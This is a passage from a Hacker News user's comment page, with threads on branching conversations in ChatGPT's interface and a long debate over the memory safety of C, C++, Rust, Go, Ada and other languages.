Hacker News new | past | comments | ask | show | jobs | submit | wodow's comments login

> * The main thing that makes ChatGPTs ui useful to me is the ability to change any of my prompts in the conversation & it will then go back to that part of the converation and regenerate, while removing the rest of the conversation after that point.

Agreed, but what I would also really like (from this and ChatGPT) would be branching: take a conversation in two different ways from some point and retain the seperate and shared history.

I'm not sure what the UI should be. Threads? (like mail or Usenet)


ChatGPT does this. You just click an arrow and it will show you other branches.


I have ChatGPT4, I have no idea what arrow you are talking about. Could you be more specific? I see now arrow on any of my previous messages or current ones.


By George, ItsMattyG is right! After editing a question (with the "stylus"/pen icon), the revision number counter that appears (e.g. "1 / 2") has arrows next to it that allow forward and backward navigation through the new branches.

This was surprisingly undiscoverable. I wonder if it's documented. I couldn't find anything from a quick look at help.openai.com .


Careful what you trust with help.openai.com. You used to be able to share conversations, now it's login walled when you share, and the docs don't reflect this (if someone can recommend a frontend that has this functionality, for quick sharing of conversations with others via a link, taking recommendations, thank you in advance).


I have a very simple UI with threading. It's really unpolished though.

https://eimi.cns.wtf/

https://github.com/python273/eimi


Nice suggestion! Threading / branching won't be too crazy to support. I'll explore ChatGPT style branch or threads and see what'll work better.


1000 upvotes for you. My brain can't compute why someone hasn't made this, along with embeddings-based search that doesn't suck.


They did make it, in 2021. https://generative.ink/posts/loom-interface-to-the-multivers... (click through to the GitHub repo and check the commit history, the bulk of commits is at least 3 years old)


I bet UI and UX innovation will follow, but model quality is the most important thing.

If I were OpenAI, I would 95% of resources on ChatGPT5, and 5% into UX.

Once the dust settles, if humanity still exists, and human customers are still economically relevant, AI companies will shift more resources to UX.


I understand your point, but my take is that when we talk about AI and its impact, we're talking about the entire system: the model, and what is buildable with the model. To me, the gains available from doing innovative stuff w/ what we're colloquially calling "UI" exceeds, by a bunch, what the next model will unlock. But perhaps the main issue is that whatever this amazing UI might provide, it's not protectable in the way the model is. So maybe that's the answer.


Their "Appendix: Memory Safe Languages" lists:

C#, Go, Java, Python, Rust & Swift


Really, the only memory unsafe languages still in use are C and C++.

If it weren't for the behemoth of legacy code we'd really have this problem more-or-less licked. Unfortunately, that behemoth is still rampaging across the landscape.

"Rewrite it in Rust" gets a bit of pushback, perhaps even justified, but at this point in time I'll take anything that just reduces that behemoth in size. The journey of a thousand miles begins with a single step, an elephant is eaten one bite at a time, etc. Rust is just one of the easier and more effective options for a legacy codebase, with the unusual advantage of being able to slip in incrementally. Almost every other language requires a true rewrite.


> If it weren't for the behemoth of legacy code we'd really have this problem more-or-less licked. Unfortunately, that behemoth is still rampaging across the landscape.

It is not only or even mostly legacy. I'm a systems programmer (in classical sense, not "but my web service is soooo highly loaded and scalable that I will call it systems programming!") and from what I see on the job people start new projects in C and C++ all the time.


Why do they choose C/C++? Is it just what they and their colleagues already know and nobody wants to be the one to push for change? Easier integration with other C/C++ stuff?


From my experience reasons differ for C and C++ programmers.

C programmers are often more experienced people who are used to "simple" language that gets out of the way. They don't want to invest time into learning tricky language like Rust with all the intricacies of its type system, borrow checker, etc. Something simpler like Zig might work for them, but it is not on the table at the moment.

C++ programmers tend to be people who spent hundreds if not thousands of hours learning its ugly corner cases, reading Meyers and Alexandrescu books, that kind of thing. Sunken cost is immense, they whole careers are built on being "C++ experts" and they dread to abandon it and have to learn another very complex language from scratch.

And managers often don't see value in investing time into switching projects to new language. From their PoV it is more like programmers just want to play with a new toy instead of doing "real work".


Why are C and C++ considered the same, in these conversations?

C++ at least has tools to make life significantly more safe. I can write a buffer overflow in any language, and on the scale of difficulty, ASM-C-C++-Rust-Python covers my experience (from easiest to fuck up to hardest).

Yet nobody is calling for us to rewrite everything in python. Why is the line drawn at Rust? It's perfectly simple to trash memory in Rust.


Because "significantly more safe than C", while true, is also irrelevant. I want safe, not "safer than grotesquely unsafe". Unfortunately, for all the advances C++ has made, it is still in the "unsafe at any speed" class. It is difficult to escape the foundation of unsafety the entire C++ edifice rests on.

(At least, without further support. I consider "C/C++ with high quality static analysis" to be de facto distinct languages, and while I would favor something else even so, high-quality use of a high-quality static analyzer is enough to calm me down. Things have still crept through that level of care, but then, interpreters and compilers for safe languages have had safety errors in them before too.)

This is particularly true because it's just C and C++ that are memory unsafe. If we still in 1980, we could be arguing about the gradients of unsafety, but in 2023, we don't need to. Unsafety is not necessary at scale.

As for why people aren't asking to rewrite in Python, I partially answered that in my post. You can actually incrementally rewrite in Rust. You can't incrementally rewrite software in Python. There is also plenty of software that can be written in C, but simply can't be written in Python because it would be too slow. (Rewriting it in Python but oh no wait I'll just write the slow bits in C is a no-op, practically.)

As for trashing memory in Rust, by perfectly reasonable convention we generally understand that unsafe is unsafe, and that while languages can't avoid having it, having it does not necessarily make the entire rest of the language just as bad as C. I can crash Haskell with a straight-up, genuine null pointer exception with the Unsafe module in a single line of code. We do not thereby call Haskell an "unsafe" language where it is trivial to trash memory. Stock Rust is far safer than C++, to the point of being not only a qualitative change, but I'd contend, multiple such qualitative changes.


Separating safe C/C++ from everyday C/C++ is not fair, in my opinion, but I get your point: If it can be abused it will be, either by accident, inexperience, or maliciousness.

Once you separate C/C++ into safe and unsafe cateogries, and admit that Rust has unsafe uses that are "just so much harder to use", we're clearly defining a gradient:

    C/C++, safer C/C++ subset or maybe Unsafe Rust, safer Rust, ...


Sure you can use safe C++ with some effort, but the libraries you use most likely still use unsafe C/C++. For Rust, I expect that the libraries are much safer in general.


Rust is memory safe by default, with unsafety as an optional feature that you basically never need to use unless you’re writing extremely low-level code, need absolute maximum performance, or are interfacing with libraries written in other languages.

C++ is unsafe by default.

Of course it’s just as easy to write bugs in unsafe Rust as it is in C++ (actually, it’s probably even easier), but defaults matter.


This is a common conception, and I agree to a point. However, interfaces matter. At the interface to _literally any_ system call, unsafe starts to creep out. Either in the wrapper implementation, or in the interface _to_ the system, or even leaking through the wrapper to the caller.

At that point, if we have to re-wrap everything in rust to hide the unsafety of the interfaces to the system (sockets, shared mem, etc etc), then why not just write safe cpp wrappers?

Yes, people are writing memory overflows in their own code, but I'd argue 99% of the critical security bugs are actually in the unsafe interfaces. And we don't really need a new language to fix that. We just need new interfaces.

I love Rust, but using it for anything nontrivial makes the "safe" patina really fade. You're quickly writing what feels like C, with MaybeUninit<X> all over.


> At the interface to _literally any_ system call, unsafe starts to creep out. Either in the wrapper implementation, or in the interface _to_ the system, or even leaking through the wrapper to the caller.

It’s quite rare to have to make syscalls directly in Rust, just like it is in c++. Most code in any large enough system is related to the internal logic of the system, not to its interface with the outside world. And when you _do_ need to interface with the outside world, you can use a wrapper (lots of the standard library is basically wrappers around syscalls; this is true in any language). And no, in Rust unsafety doesn’t typically “leak through” interfaces, unless those interfaces are buggy.

> why not just write safe cpp wrappers?

There’s no such thing. It’s not possible to write a safe interface to c++ code in the sense that that term is used by the Rust community. In Rust, “safe interface” means: assuming there are no bugs in the underlying code, and the client code never invokes `unsafe`, using the interface cannot cause undefined behavior. This is impossible to guarantee in c++.

> I love Rust, but using it for anything nontrivial makes the "safe" patina really fade. You're quickly writing what feels like C, with MaybeUninit<X> all over.

This is not true at all in my experience. I work on Materialize, surely one of the more non-trivial Rust programs that exists. We use very little unsafe/MaybeUninit/C-like code. Do you have an example of a codebase you’re thinking of that does this?


And that's the problem, I do have to make syscalls directly quite often, and so I dislike Rust immensely. There are literally dozens of us at least, but the only people ever talking about Rust on the internet always like to drag C into the conversation for whatever reason even though they are always C++ programmers.


That's fair! If you are doing something low-level enough that the bulk of the work is interfacing directly with a C library (or with the kernel, in the case of syscalls) then C might make more sense than Rust.


OK this is reasonable. Perhaps my experience skews towards the lower-level a bit too much. And it's also reasonable I'm misusing the language given it's not my day job.

To answer your question, I'm referring to much of the networking code in socket2 / socket, which uses MaybeUninit when doing non-standard stuff like forming your own packets. (RAW)


Yep, I definitely buy that if you're doing very low-level stuff, C or C++ might be more ergonomic than Rust. But I don't think that covers most of the real-world use of C++.

I'm not too familiar with `socket2` but normally in Rust to construct a buffer with arbitrary bytes in safe code you would first zero it out and then write it. Using `MaybeUninit` there is presumably just a micro-optimization to avoid having to memset things to zero.


C++ makes it very difficult to write safe interfaces. You can't expose references, nor spans, nor variants, no shared_ptrs to things that can't be thread-safely overwritten, nor any standard library containers nor a lot of other things. And even if you only use whatever few interfaces remain safe, the interfaces you create are unsafe by default too. As a result, these unsafe interfaces are everywhere.

I'd contend that using Rust for anything nontrivial results in MaybeUninit & co being common.


I feel I have to disagree with your (implied) contention that it's feasible to write an API in C++ that, no matter what its inputs are, cannot ever exhibit undefined behaviour.

Because that's what "safe" in Rust means. No memory safety errors, no undefined behaviour.


Who operates crates.io ?


It’s owned by the Rust Foundation.


No I've seen libraries that need the user to use it by default. The wgpu library is one example. It's not even that low level. Rust stuff is a little too safe that it influences code organization and modularity as well.


People are calling for the use of languages like java or python when it is appropriate. Rust is just specifically mentioned (along with Swift, to some degree) when it comes to applications that have a couple of fundamental requirements that prevent the use of other languages. These might be requirements like no pausing for GC or the ability to run without a VM.

Rust (and Swift) are viable languages for solving most problems that people usually reach for C or C++ to solve today and both make it considerably more difficult, by default, to introduce the most common class of serious security vulnerabilities in the modern world.


I don't think C and C++ are that different. I agree that C++ gives you tools to make safer abstractions, but it still gives little tools to enforce these abstractions. For example std::shared_ptr being easy to use is a great improvement as in many cases you can just use it rather than trying to prove that you don't need it so that you don't need to bother implementing your own reference counting.

In C++ vec[999] is a buffer overflow and you can index any pointer even if it isn't supposed to be an array. There are so many easy mistakes that can be made and aren't obvious to a reviewer. Maybe with a very strong linter you can consider C++ very distinct from C, but by default I don't think it is that different.

> I can write a buffer overflow in any language

Try doing it in JavaScript? If so the Mozilla security team would appreciate a private disclosure. Of course it is possible in any non-sandboxed Turing complete language, but there is a huge difference between the default accessor of the most used container type allowing it vs needing to use functions in the `sun.misc.Unsafe` package or wrapping your code in an `unsafe` block. Making code that may cause a buffer overflow explicit is a night and day difference. It means that you can't do it via a typo in the vast majority of your code, and it will grab the attention of your reviewer very quickly. Isolating the part of the code that can cause buffer overflows to a small part greatly raises the attention that is given to those areas, and greatly reduces the chance of them occurring.

I don't think that Java or Rust prevent all buffer overflows, but I also don't think that it is possible to write C or C++ without them. Sure, it is possible to be careful and avoid most of the buffer overflows most of the time, but we and our reviewers are just human so we will never prevent all of the buffer overflows all of the time.

I don't think that this recommendation is under the impression that "memory safe languages" will prevent all buffer overflows, but the idea is that they will greatly reduce the number. In many situations, I would guess the majority of them, this is a good tradeoff.


> It's perfectly simple to trash memory in Rust.

What makes you think so? Most Rust programmers and programmers from other languages, agree that this is not possible. I might be missing something, but can you give an example of such simple methods to trash memory in Rust, asking from a curiosity standpoint?


I would assume they mean through the use of unsafe, which is true, but in practice unsafe code is less common than people that don't write Rust seem to think and tools like Miri help a lot to write unsafe that doesn't write to memory locations you weren't meant to.


Perhaps they aren't writing Rust because those are the people that need to write unsafe code. Chicken and egg. I'm sure it you forced all the C programmers to switch to Rust you would see a lot more use of unsafe.


But there are plenty of projects out there that are written in Rust and have to deal directly with hardware and syscalls. Hubris, a kernel written in Rust has 94 files referencing unsafe[1] out of 414 total .rs files[2]. This is as "bad" a ratio as you're gonna encounter in a project. There are many valid reasons one can have to not use Rust. "I need a lot of unsafe" is not really one.

[1]: https://github.com/search?q=repo%3Aoxidecomputer%2Fhubris+un...

[2]: https://github.com/search?q=repo%3Aoxidecomputer%2Fhubris++l...


I don’t think most Rust programmers agree it’s impossible at all.

There’s always unsafe. I can make a pointer to anywhere by hand and write to it. That would involve some very intentional work, but I could do it if I wanted to.


There's a difference between "chamber a round, remove the safety, aim at the foot, shoot" and "open the kitchen faucet, leg gets blown off".


Yes of course. But the GP said it isn’t possible. It is. It’s not even hard.

But I did disclaim that it had to be somewhat intentional.


> I can write a buffer overflow in any language. ... It's perfectly simple to trash memory in Rust.

Not in safe Rust.


You're more right than wrong, but I want to push back just a little. You can write a buffer overflow in safe rust if you store multiple things in the same array and work with indices rather than slices. Of course the risk is bounded by what shares an array, and it's more awkward than doing it any of several right ways. You won't write a buffer overflow in safe rust... but you can if you want to.


This is a bit like saying "you can write a buffer overflow in any turing-complete language, because you can write a C emulator, and then write the buffer overflow in C"


A bit, but in that case the buffer overflow is arguably still "in C" in a way that it isn't in my example.

As I said, you won't write a buffer overflow in rust, but unpacking why can be interesting and it doesn't end at "bounds checks".


> Why are C and C++ considered the same, in these conversations?

Conjunction is not equality. They are both memory unsafe. Then you can argue from that over how memory unsafe they are in practice (using the right practices, using the right language subset).


What I don't understand is the excitement for using Rust vs. using garbage collected languages like Golang, at least for high-level applications (performant or low-level systems applications are excepted here.) My experience is that an experienced programmer can be a lot more productive quickly with Golang, since they don't need to climb the Rust borrow-checking learning curve. Rust doesn't even free you from the need for a runtime or standard library.


> My experience is that an experienced programmer can be a lot more productive quickly with Golang, since they don't need to climb the Rust borrow-checking learning curve.

Will somebody please tell me why everyone seems obsessed with optimizing for programmers going from zero to minimally productive?

I have been using Ruby for twenty years, Rust for eight, golang for nine, and C for twenty-six. Most programmers will use a language for dramatically longer than a year, so why are the first three months such a singular point of focus?

The code I wrote in the first three months of using every one of these languages was bug-ridden, unidiomatic, unnecessarily difficult to maintain, and generally terrible. Ironically, Ruby was probably the least bad in this regard. Go and Rust were probably about the same, but I’d frankly give Rust the slight edge here. C was the inarguably the worst, but it was also my first language.

Subjectively and retroactively comparing things a year in, I’d wager my Rust was of the best quality (readability, ease of maintenance, speed of development, bugs per “unit of functionality”), followed by Go, Ruby, and then C. At five years, the quality of my Rust code blows everything else out of the water. My C was still terrible (partly because it was C, partly because it was still my first language). But I’d say Ruby edged out Go at this point for me.

Obviously this is not only anecdata but wildly guesstimated looking back and comparing learning curves on languages at completely different points in my experience as a programmer. I’ll happily admit that Rust pulling so far ahead so quickly is as likely to do with it building off the knowledge of prior decades of professional software engineering. And that my personal experience with any of these languages is of course unique to me and my circumstances.

But it just seems wild to me that people seem to focus on “getting a new person up to speed as fast as possible” to the exclusion of apparently everything else.


Conversion friction. Very important. Arguably the reason why Haskell is not 10-100 times more popular than it currently is; the conversion friction is just too much, and even if all the tooling was perfect and the libraries were perfect and the documentation was perfect it would still have too high a conversion friction to attract a community the size of Go or C# or something.


I can sympathize somewhat with this argument. But it’s also kind of circular to me.

Go being easy to pick up and learn is certainly a virtuous cycle insofar as it helps bootstrap a large community. And that’s absolutely happened!

But that is—in my mind—more of an explanation for why Go has become so popular so quickly more than it is a compelling argument for the language itself. Haskell having conversion friction might explain its lack of adoption, and that’s certainly a great argument in a discussion about why or why not to adopt it for yourself or your team! But it seems like an overvalued axis on which people seem to evaluate languages on their own.

As a counterexample: PHP classically had a reputation as being a language that was very easy for beginners to pick up. And it’s even memory safe! But it also had a reputation for having poor long-term prospects for projects written it as well as being a limiting factor in the growth of engineers using it (note: I make no claims as to the fairness of this reputation, nor to its applicability on “modern” PHP).

PHP is arguably even easier to learn than Go. So why is it that virtually nobody jumps in these discussions trumpeting that?


From the article: "In contrast, Rust's explicitness in this area not only made things simpler for us but also more correct. If you want to set a file permission code in Rust, you have to explicitly annotate the code as Unix-only. If you don't, the code won't even compile on Windows. This surfacing of complexity helps us understand what our code is doing before we ever ship our software to users."

https://vercel.com/blog/turborepo-migration-go-rust


I’m writing a sibling comment to answer the parent’s question directly rather than the meta-argument from my original reply.

> What I don't understand is the excitement for using Rust vs. using garbage collected languages like Golang… since they don't need to climb the Rust borrow-checking learning curve.

Because, in my experience, climbing that learning curve has made me a better programmer more than nearly any other change in my long career. And that benefit has extended to code in every language I write.

The borrow checker isn’t just some hurdle to get in your way; it’s trying to tell you (awkwardly at times and perhaps less helpfully than one would wish) something fundamental about the way you think about and design programs. Internalizing that lesson can bring significant benefits on designing systems with clean boundaries that are easier to test, easier to reason about, and easier to compose.

Besides that, Rust greatly assists you (through features other than the borrow checker) in building software that is correct. This means it will tell you in a much wider variety of scenarios when future code invalidates previous assumptions. This is invaluable for projects that we expect to survive for a long time since the time a project is maintained will dwarf the time it’s under active development. And it will almost certainly be maintained by someone without the full context of the original developer(s). This is true even if the maintainer is the same person who wrote it in the first place, since our mental model of a program bitrots far faster than the program itself.

In practice, this aligns with my personal experience. Go projects end up with a lot of implicit assumptions that are silently violated by future work and expose bugs. They crash on nil pointer derefs. They accrue a multitude of linting tools that usually paper over some of the language’s shortcomings, but only in common cases. And they become painful to maintain as the original developers move on to other projects, with new changes grafted haphazardly into dozens of touch points instead of cleanly in one or two places. Yes, you can “easily” follow what any particular function does, but to do so you have to parse out and mentally model every minute detail, rather than being able to reason at a high level.


>Rust doesn't even free you from the need for a runtime

I always thought that Rust was the only memory-safe language that doesn't need a runtime (beyond the libc that every language links to when running on Unix-like OSes). Maybe you could define what you mean by runtime.


> Rust doesn't even free you from the need for a runtime or standard library.

Could you elaborate on this? Rust doesn't have a runtime (beyond what C has), and am having trouble understanding what you meant to say about stdlibs.


Rust certainly performs runtime bounds-checking as well as some other tasks, so there is runtime code (even if it's just compiled into executables.) If you want features like async (standard in many language runtimes) you're also going to have to pull in some kind of external runtime dependency. And everyone doing high-level web-style development seems to drag in something like tokio.


> Rust certainly performs runtime bounds-checking as well as some other tasks, so there is runtime code (even if it's just compiled into executables.)

I don't think I've ever seen anyone reference "C with bounds checks enabled" as "having a runtime". Does having stack probes also imply having a runtime? I guess I'd be less surprised if it had been worded as "some mitigations/features have a runtime cost".

> If you want features like async (standard in many language runtimes) you're also going to have to pull in some kind of external runtime dependency.

Yes, you can add a runtime to your application (if you need to use async/await). It has an additional cost over not doing that, but the "promise" is that it is "zero (additional) cost (over what you'd end up with if you wrote the functionality by hand)".


For sure C programs have a runtime. I'm debugging an issue right now that is to do with Windows not shipping VCRUNTIME140_1.DLL on out-of-the-box or old versions of Win10, so in that case it's very clear because you can make C programs that won't start due to a missing runtime library.

The runtime isn't all that large but every OS has one. On UNIX it's spread over libc, libpthread, libgcc, libm and so on.

On Linux stack probes usually have some support code in libgcc and/or glibc, if I recall correctly.


That's a rather idiosyncratic definition of "runtime"


(not the parent) You're not wrong but you're not right either. There's basically a colloquialism where many developers say "runtime" to mean "large runtime" and "no runtime" to mean "small runtime," but that doesn't mean that crt0, the "c runtime starting from zero", doesn't exist, just that we've ended up in a place where this gets confusing to talk about because nobody uses the same definitions.

So if it's idiosyncratic really depends on what audience you're talking to.


It's the correct definition and I don't know of anyone familiar with OS design that would claim C doesn't have a runtime. It very much does. So does C++. Every language does, except assembly.

It may feel like C doesn't have a runtime if you're only familiar with UNIX, because the C runtime is guaranteed to come with the OS there whereas other language runtimes are optional and thus more visible. But every language has a runtime.


People writing C are the people that really do have to make syscalls directly, or use weird calling conventions, or whatever all the time. I see Rust replacing C++ but I have a hard time seeing it replace C because the people that desired and/or could tolerate safety, like you said, are already not writing C for the most part. That group has been firmly C++ for a long time.


> People writing C are the people that really do have to make syscalls directly,

Not really. See for example desktop Linux (i.e. Gnome).


>Really, the only memory unsafe languages still in use are C and C++.

Ada, Fortran, assembly?


Fortran does not end up where I'm too worried about its security. C and C++ does. At the scale I'm talking about I'm not sure we'd even say Fortran is "in use".

Assembly is in use, yes, but in 2023 I feel there is generally an understanding of the risks and I haven't seen the "write everything in assembly" crew in about 15 years. The problem is that there's still too many programmers blithely using C and C++ without realizing the risks and thinking they can cowboy through the problems. For every line of vulnerable, dangerous assembly I bet there's thousands of lines of C or C++.

There is also the problem that there have been some big bugs that got through even static analysis and fuzz testing, but I'd still be at least reasonably satisfied if all the critical software in C and C++ would be supported by those tools. Interpreters and compilers have had non-zero error rates too.

At the scale I'm talking about, Ada is a non-entity as well. It isn't used. "But it is! I'm a professional Ada programmer!" says someone reading this to themselves. In which case I would say, you darned well know what I mean and don't pretend otherwise just to try to score useless internet points. Ada is not a relevant force on the programming world. That may be sad, but it's true.


SQLite is able to carry most of the justification for C itself at this point.

Duplicating the DO-178B certification that it has obtained in an endorsed language will be an incredible burden for any who attempt it.


Ferrocene has said in the past they plan on going for DO-178 in the future.


But we do not plan on rewriting SQLite, that much I can say :)

(My reading is that the GP points to the exemplary achievement that SQLite has reached a close to (security) bugfree, at what I consider a nearly superhuman effort)


That's a good point, I certainly didn't mean to imply that you were!


Objective-C?

Plus everything that needs to directly interface with the above languages. So many Python libraries that are one "funny integer" away from a nightmare debugging session.


Fortran is probably as bad as C, and Ada isn't truly memory safe - they link to Ada/Spark which is but that doesn't seem to have much widespread use.

https://www.adacore.com/about-spark


Isn't Ada/Spark in avionics the main use case for Ada these days? So, huge share of a tiny market?


> Isn't Ada/Spark in avionics the main use case for Ada these days?

Hasn't it always been? I'm no expert but always assumed that it was used basically military and avionics, and perhaps other safety critical equipment.


I think it's also used in high speed rail.


Also weapon systems.


Fortran is used for scientific computing. The crash of crashing a run on someone's Beowulf cluster is high, but the severity is low.


Fortran doesn’t even have dynamic memory allocation, so it’s inherently safe.


It actually has had this since Fortran-90, and there's even a 'pointer' keyword.


https://www.ibm.com/docs/en/xffbg/121.141?topic=attributes-a...

No pointer direct arithmetic, though. If you allocate the memory via allocate, you can inquire if it's been deallocated.


Isn't Ada memory-safe?


Ada isn't, Ada/SPARK is. That's a subset of Ada, and while it is the main draw of the language for new projects the majority of extant Ada code predates SPARK.



In summary, Ada tries to be memory safe by default -- as far as that can be done without requiring automatic memory management and garbage collection -- but deliberate use of "unchecked" language features can break memory safety.

In other words, if you go out of your way to use unsafe features, and don't use the features that compensate, Ada is memory unsafe. This has become the goto dismissal of Ada, apparently more popular than "eww...a BEGIN..END language" and "designed by committee/government tainted".


But other languages use c++. I think r for example is widely used and has a ton of packages where people write often buggy c++.


Rust is a little too safe imo. I want a rust with just shared pointers and no move semantics. I guess go would be it? But go is too opinionated with a bunch of stupid go specific philosophies like the weird error handling and the stupid packaging rules.

Go is also opinionated with concurrency. So that's an issue too.


Ocaml then?


I like functional, but this isn't what I'm referring too. OCaml by being functional is opinionated.


It's unfortunate that there's no mention that not all these languages are equally safe.

Go isn't memory safe when using goroutines. See: Golang data races to break memory safety: https://blog.stalkr.net/2015/04/golang-data-races-to-break-m...


That's fine. Safety with concurrency doesn't exist in any language. Only rust is special in that it tries to provide safety with concurrency as well. I haven't seen any other language besides rust actually do this.

The reason is obvious. There's a high cost to this type of safety. Rust is hard to use and learn and many times it's safety forces users to awkwardly organize code.

And there's still the potential for race conditions even though the memory is safe, you don't have full safety.


Swift provides memory safety with concurrency as well.


It's not safe when using goroutines to access shared mutable data (and most Go code does this). If you stick to message passing a.k.a. "share data by communicating" you don't run into memory unsafety. But this kind of design is more vulnerable to other concurrency issues, viz. race conditions and deadlocks.


Go is memory safe, that post does not means anything in real life scenario.

Do you have a single example in the last 14 years of memory safety exploit using the Go runtime? I'm talking about public and known exploit not ctf and the like.


The same author has a post from 2022 [1].

> Is it possible to achieve arbitrary code execution on any Go version, even with PIE, and with no package import at all, just builtins? Yes!

Whether it's capture the flag is irrelevant, IMO, because anything that's allowed by the compiler will emerge given enough complexity.

1: https://blog.stalkr.net/2022/01/universal-go-exploit-using-d...


Wow, that's super interesting. As you say, it's a contrived CTF example, but I'm pretty shocked that it's possible to read and write arbitrary process memory without importing any packages (especially unsafe, of course).

I'm also surprised that a fix has been theorized at least as far back as 2010[1], but not implemented. Is adding one layer of internal pointer redirection for interfaces, slices, and strings really that much of a performance concern?

[1] https://research.swtch.com/gorace


Go was released in 2009 and I've never heard about any exploit and what not , by the way this is known and by design it's not new. It's all about the multi word for interface.

I mean if in 14 years there was nothing it's a proof that it's not an issue.

Even the attacker ack that it's not a threat.

"As said before, while a fun exercise it's pretty useless in the current Go threat mode"


How long was openvpn in use before we discovered heartbleed?

Or bash before shellshock


Adding some more for other languages:

* many GC'd languages like Go, C#, Java make it harder to leak memory, while languages where reference counting is more prevalent (Python, Rust) it can be easier to leak memory due to circular references.

* Languages with VMs like C#/Java/Python may be easier to sandbox or execute securely, but since native code is often called into it breaks the sandboxing nature.

* Formally-verified C code (like what aerospace manufacturers write) is safer than e.g. Rust.

* For maximum safety, sandboxing becomes important - so WASM begins to look appealing for non-safety-critical systems (like aerospace) as it allows for applying memory/CPU constraints too in addition to restricting all system access.


You can also cause a segfault in Go by dereferencing a null pointer. That's another example of not being entirely memory safe.


In this case it's not memory unsafe. It is guaranteed to crash the program (or get caught). It's closer to a NullReferenceException than it is to reading from a null pointer in C. There's no memory exploitation you can pull off from this bug being in a Go program, but you could in a C program


It's only guaranteed because of the operating system's sandboxing.

> It's closer to a NullReferenceException than it is to reading from a null pointer in C.

No, it's exactly the same as a null pointer dereference in C, because it is literally reading from a null pointer in Go as well. In Java, the compiler inserts null checks before every single dereference and throws an exception for null references.

> There's no memory exploitation you can pull off from this bug being in a Go program, but you could in a C program

Provided the OS sends a SEGV signal for null pointer dereferences, I don't see there being a difference in security between C and Golang in this respect. It's a bigger problem when you're running without an operating system.


In huge number of cases the null dereference is not from accessing 0x0 but some offset to it (ie. accessing a struct member or array element that's not the first one). Of course in practice most of the offsets are below the limit where nothing is ever mapped (on Linux vm.mmap_min_addr and seems 64k by default for me) but it's still very possible to have such dereference to not segfault in C. That should not be possible in Go/Java (if it is, it would almost certainly be considered a bug in the compiler/VM).


Why isn't it possible in Go? If you can use pointers to structures in both Go and C, and you can access the fields of a structure through a pointer in both, then I don't understand why reading a structure field through a null pointer wouldn't cause the dereference of an address like 0x8 in both languages.


Unbounded/large offsets are the critical part. Minimum unit where memory protection can be set is one page (4096 bytes on x86), so compiler could reasonably assume that offsets 0-4095 are always safe to dereference (in the sense that SIGSEGV is guaranteed, which can be then turned into a NullPointerException in the SIGSEGV signal handler) without a NULL check. For anything larger or array accesses, add a explicit check for NULL before dereference.


> In Java, the compiler inserts null checks before every single dereference and throws an exception for null references.

Doesn't OpenJDK install a SIGSEGV handler, and generate the exception from that on a null dereference?

(AFAIK, a lot of runtimes for GC'd languages that support thread-based parallelism do so anyway, because they can use mprotect to do a write barrier in hardware.)


> Doesn't OpenJDK install a SIGSEGV handler, and generate the exception from that on a null dereference?

I thought I had read that they explicitly don't do that, but I can't find it anymore. You may be right. I should have checked before saying that.

> (AFAIK, a lot of runtimes for GC'd languages that support thread-based parallelism do so anyway, because they can use mprotect to do a write barrier in hardware.)

That's true. I guess those implementations must do something more advanced than "throw a NullPointerException if the program segfaults," given their garbage collector runtimes also rely on that signal.


> I thought I had read that they explicitly don't do that

This is exactly what they do: https://shipilev.net/jvm/anatomy-quarks/25-implicit-null-che...

When this happens it'll cause a deoptimization and recompilation of the code to include the null check rather than rely on the signal handler repeatedly.


Thanks for the link!


Why is Python listed there and not other languages like Ruby, Javascript or Perl?


It’s the only scripting language listed — I suspect scripting languages weren’t the focus, but that it got special consideration and added to the list to not place the AI/ML R&D communities in an awkward spot. Of course they should move to something besides Python, but network effects give Python powerful inertia, and AI/ML is a strategic area.


Commenting bc I had the same question.

My impression of historical Python is that is an old, partially arcane language that due to D.S/AI is now popular; I would initially think it would be no better than those other interpreted. Python does these things well... mainly due to pandas/dataframes/polars.

<btw, Perl? ;) >


Language wise, Python is basically just Perl with its arms cut off and bunch of makeup added. It's just very popular in the scientific community, so they have to add it.


Python does not have a lot in common with Perl language-wise, so this seems an odd statement.


Python was based off Perl, so yes it does have a lot in common with Perl.


Nope. That's not at all accurate.


How did you get that idea?


I don’t know how you can possibly come away with this conclusion after studying both languages. Maybe if your point of reference is an ancient version of Python?


Yes it is and current Python is basically just an object oriented system hacked on top of ancient Python. The underlying elements beneath the syntax is basically all the same.


Python replaced Matlab too.


I think the familiarity when moving from Matlab to Python helps a lot with adoption.


Python is far more popular than the other two for non-web development.


I don't think Ruby is used a lot at NSA, other than that, it's weird that it did not get mentioned.

They should've instead just said Python and languages alike?


No offense to Ruby, but if I were going to push people to change to a new language I would not recommend Ruby. It had its time of popularity and I feel like it's just a niche language now, surpassed by others.


> if I were going to push people to change to a new language I would not recommend Ruby

None of the alternatives except Go and Swift is new. Ruby has turned into a robust boring technology, it does not mean it’s unworthy.

The Ruby team is still pushing the languages features and speeding up the runtime. Take a look at Ruby Ractors for example.

I do have to agree on that Ruby is more of a niche language now thanks to Rails but I’d say Ruby works very well for scripting and gluing together different systems.


From a memory safety perspective, I would say the same about python. The libraries that make it popular are all written in c++ to my knowledge. Anyone not already using python usually has better tools to choose from these days.


Because Python is widely used on the backend?


I would bet it's more unsafe to use Perl than C, on average.


Ada people scratching their heads....


Neither Ada nor Rust are completely memory-safe... and they are partially unsafe in completely different ways. But I guess people prefer the Rust explicitness.


Ada is safe if you never free memory explicitly. The story for reclaiming memory without GC was always a little weird, basically pool allocation by type. But it does bounds checking, counted strings, and has a reasonably rich type system that allows variants and things in a safe way.


Ada has Controlled types, so the memory reclaiming story can be similar to C++/Rust RAII. What it's missing compared to Rust is the lifetime and borrow checking.


How many of them are left? I thought it was very much a dead language


Far from it.

"SQL/PSM (SQL/Persistent Stored Modules) is an ISO standard mainly defining an extension of SQL with a procedural language for use in stored procedures... SQL/PSM is derived, seemingly directly, from Oracle's PL/SQL. Oracle developed PL/SQL and released it in 1991, basing the language on the US Department of Defense's Ada programming language. However, Oracle has maintained a distance from the standard in its documentation. IBM's SQL PL (used in DB2) and Mimer SQL's PSM were the first two products officially implementing SQL/PSM. It is commonly thought that these two languages, and perhaps also MySQL/MariaDB's procedural language, are closest to the SQL/PSM standard. However, a PostgreSQL addon implements SQL/PSM (alongside its other procedural languages like the PL/SQL-derived plpgsql), although it is not part of the core product."

https://en.wikipedia.org/wiki/SQL/PSM


As I understand, there's a very long tail of continued Ada use in military and aviation.

So depends on your definition of "dead"



It's still very popular in air traffic control. Some older NASA and military projects used it and are still in use.


There are still plenty of Ada devs around, but they're almost all in the DoD or working for defense contractors.


It is odd since Ada is DoD's (bastard?) child and NSA is DoD but a little digging you get this from 1997 (with a singular mention of the word "safety"):

